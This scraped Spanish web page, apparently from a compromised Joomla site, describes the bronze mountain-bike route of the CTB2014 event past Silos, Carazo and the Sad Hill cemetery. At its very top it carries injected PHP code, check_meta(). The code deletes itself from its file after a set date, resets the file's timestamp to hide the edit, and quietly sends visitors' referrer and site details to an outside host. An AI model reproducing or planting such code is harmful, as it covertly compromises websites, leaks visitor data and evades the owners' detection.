check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456731446){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=5&id=18776729&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_contact/models/content.php"); } Descripción recorrido Bronce CTB2014
Banner
Banner
Banner
Banner
Banner
Banner
Banner
Banner
Banner
Banner
Banner
Banner
Multimedia
Banner
Banner
Banner
Banner
Calendario
<<  Julio 2017  >>
 Lu  Ma  Mi  Ju  Vi  Sa  Do 
       1  2
  3  4  5  6  7  8  9
10111213141516
17181920212223
24252627282930
31      

Descripción recorrido Bronce CTB2014

El recorrido CTB2014 bronce consta de 22 kms y 500 m desnivel positivo, no por la corta distancia es un recorrido de iniciación. Zonas de subida pedregosa y bajadas reviradas le hacen técnico aunque de un nivel físico medio. Todo un reto para bikers con algo de experiencia y ganas de irse superando poco a poco. En solo 22 kms disfrutarás de la esencia de esta prueba!!!

La salida es a la misma hora y lugar de los demás recorridos y podrás compartir parrilla de salida con demás bikers, solo tú en el momento de la bifurcación de recorridos decides si continúas el reto al recorrido plata o das por concluida tu aventura.

Los primeros 2 kms son asfaltados para facilitar que el grupo se estire y cada uno vaya cogiendo su posición natural dentro del pelotón, continuamos por buen camino hasta el km 5 que volvemos a pasar por Silos, donde el gentío nos recibe entre aplausos. A partir de este punto empieza lo más duro de el recorrido bronce, la ascensión a la copeta, no con grandes desniveles pero si sus zonas técnicas que harán sacar lo mejor de ti, entre preciosos sabinares y un paisaje incomparable llegamos al alto de la Copeta, una vista espectacular del Valle de Merendilla con el pueblo de Carazo al fondo, nuestro próximo destino. En otras ocasiones por diferentes motivos no nos habíamos adentrado en tan bonito pueblo, pero desde la organización creemos que Colina Triste es para que disfruten los bikers del calor y amabilidad de los lugareños y porque no, para que también los vecinos de toda la comarca disfruten de los bikers.

 


Después del técnico pero lento descenso en zigzag de la copeta nos recibe el pueblo de Carazo,  con el primer avituallamiento liquido y solido (agua, isotónicos etc y frutas variadas) en el km 11, seguimos el camino dirección del valle de Merendilla en el cual se rodó gran parte de la película El bueno, el feo y el malo, hasta llegar al famoso cementerio de Sad Hill, el camino es sencillo pero con una pequeña tendencia ascendente.

En el famoso cementerio de Sad Hill (Colina Triste) se colocará la Meta Volante en el km 17, el primero en pasar que complete el recorrido Oro recibirá un obsequio de uno de nuestros patrocinadores. A partir de aquí 2,5 kms de ascensión al alto de la Posisi, la primera parte con más pendiente de ascensión pero por buen firme, lo que facilita el buen rodar, y la parte final de ascensión por camino de piedra compactada, donde podremos disfrutar de las magnificas vistas del valle y el cementerio de Sad Hill. Ya coronada la subida a 1250 metros de altitud nos encontramos el Punto de Control 1 y desde ese punto comienza un frenético descenso de 3,5 kms, considerado por muchos participantes uno de los mejores y más divertidos descensos del circuito provincial.

Los primeros 500 metros piedra suelta hace que los bikers se esfuercen por elegir una buena trazada, una vez sorteada esta primera parte del descenso comienza la segunda mucho más rápida, curva a izquierdas, derechas y algún que otro salto con la imagen de Silos al fondo hace que sepamos que la marcha bronce este a punto de acabar.

 

Callejeamos unos metros por el pueblo de Silos entrando en meta y recibidos por un caluroso recibimiento por parte de los allí asistentes.

 

Escribir un comentario

Código de seguridad
Refescar